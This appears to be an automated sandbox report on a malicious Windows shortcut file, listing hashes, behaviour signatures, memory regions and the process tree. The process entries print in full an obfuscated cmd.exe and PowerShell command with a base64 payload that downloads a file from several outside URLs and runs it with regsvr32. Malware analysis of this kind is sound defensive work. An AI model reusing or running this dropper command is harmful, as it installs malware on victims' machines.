Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/11/2024, 14:23

General

  • Target

    b19d5b161b83c193d016f74647fc1d2a9f1e6636c5afd7ce62ff4ee01710daf7.lnk

  • Size

    2KB

  • MD5

    c0d7fcd20cbc603528ade0b5a1a3a7ce

  • SHA1

    7b35c86a7776ec8af3ee1d02ea9b5b181f7fe74f

  • SHA256

    b19d5b161b83c193d016f74647fc1d2a9f1e6636c5afd7ce62ff4ee01710daf7

  • SHA512

    9bd83f70258cce6affd665caeca22b7373b679c62294261d5746c40fa37fc345f8ebb921bb4b46994cbda691d0ea13939dfc8e66258af3ca5245dc7b6ad7bd64

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\b19d5b161b83c193d016f74647fc1d2a9f1e6636c5afd7ce62ff4ee01710daf7.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4116
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /v:on /c wuyDKmUSLKzMKwJg9InkOwPItXZ+cGEFIJI/n82+IdKwS77xnlHdOk/3nq1WuI/9B2v4Ln9g||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$iAi='ICAgV3JpdGUtSG9zdCAibmlqakgiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHBzOi8vbGFuY2VyLmNvbS5zZy9pbWcvMXJ6LyIsImh0dHA6Ly9sYW1wZWR1c2EubWUvd3AtY29udGVudC9IbFgwY0pwVUpYQmh1QmFNZFYvIiwiaHR0cDovL2xhbW9uZGF0aGVmb29kLmNvbS9qcy92YzUvIiwiaHR0cDovL2xhbm5zam8uY29tL2Jsb2dzLzlHSldEWFFMTEdrcWtvSUlwYi8iLCJodHRwOi8vbGFzc2VyeWJlcmcuZGsvd3AtaW5jbHVkZXMvempsbFFkZWV1aUdBQlpRbC8iLCJodHRwOi8vbGVhcm52aWFvbmxpbmUuY29tL3dwLWFkbWluL2YxdGlzU1RTLyIsImh0dHA6Ly93d3cubGFrb3IuY2gvbGFrb3IvYWRZLyIpOyR0PSJPckNCZyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxFWndFclVNZmZCLkhveTtSZWdzdnIzMi5leGUgIiRkXEVad0VyVU1mZkIuSG95IjticmVha30gY2F0Y2ggeyB9fQ==';$Pnt=[System.Convert]::FromBase64String($iAi);$bhk=[System.Text.Encoding]::ASCII.GetString($Pnt); iex ($bhk)}"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:3504
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -c "&{$iAi='ICAgV3JpdGUtSG9zdCAibmlqakgiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHBzOi8vbGFuY2VyLmNvbS5zZy9pbWcvMXJ6LyIsImh0dHA6Ly9sYW1wZWR1c2EubWUvd3AtY29udGVudC9IbFgwY0pwVUpYQmh1QmFNZFYvIiwiaHR0cDovL2xhbW9uZGF0aGVmb29kLmNvbS9qcy92YzUvIiwiaHR0cDovL2xhbm5zam8uY29tL2Jsb2dzLzlHSldEWFFMTEdrcWtvSUlwYi8iLCJodHRwOi8vbGFzc2VyeWJlcmcuZGsvd3AtaW5jbHVkZXMvempsbFFkZWV1aUdBQlpRbC8iLCJodHRwOi8vbGVhcm52aWFvbmxpbmUuY29tL3dwLWFkbWluL2YxdGlzU1RTLyIsImh0dHA6Ly93d3cubGFrb3IuY2gvbGFrb3IvYWRZLyIpOyR0PSJPckNCZyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxFWndFclVNZmZCLkhveTtSZWdzdnIzMi5leGUgIiRkXEVad0VyVU1mZkIuSG95IjticmVha30gY2F0Y2ggeyB9fQ==';$Pnt=[System.Convert]::FromBase64String($iAi);$bhk=[System.Text.Encoding]::ASCII.GetString($Pnt); iex ($bhk)}"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4352

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0l0oa2hg.12x.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/4352-0-0x00007FFF4B663000-0x00007FFF4B665000-memory.dmp

    Filesize

    8KB

  • memory/4352-6-0x0000017BC1CB0000-0x0000017BC1CD2000-memory.dmp

    Filesize

    136KB

  • memory/4352-11-0x00007FFF4B660000-0x00007FFF4C121000-memory.dmp

    Filesize

    10.8MB

  • memory/4352-12-0x00007FFF4B660000-0x00007FFF4C121000-memory.dmp

    Filesize

    10.8MB

  • memory/4352-13-0x00007FFF4B663000-0x00007FFF4B665000-memory.dmp

    Filesize

    8KB

  • memory/4352-14-0x00007FFF4B660000-0x00007FFF4C121000-memory.dmp

    Filesize

    10.8MB

  • memory/4352-19-0x00007FFF4B660000-0x00007FFF4C121000-memory.dmp

    Filesize

    10.8MB